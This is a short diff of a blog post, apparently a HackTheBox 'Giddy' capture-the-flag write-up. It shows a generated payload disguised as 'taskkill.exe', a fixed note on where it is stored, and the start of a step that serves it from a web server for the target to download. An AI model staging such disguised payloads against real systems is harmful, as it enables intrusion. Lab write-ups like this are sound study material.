1n4r1/1n4r1.github.io/_posts/2019-02-26-Hackthebox-Giddy-Writeup.md

 [+] taskkill.exe stored at /root/.msf4/local/taskkill.exe
 {% endhighlight %}

-Then, we had our payload in the Phantom-Evasion directory.<br>
+Then, we had our payload in /root/.msf4/local.<br>
 Next, run a simple webserver to let Giddy download the "taskkill.exe"

 {% highlight shell %}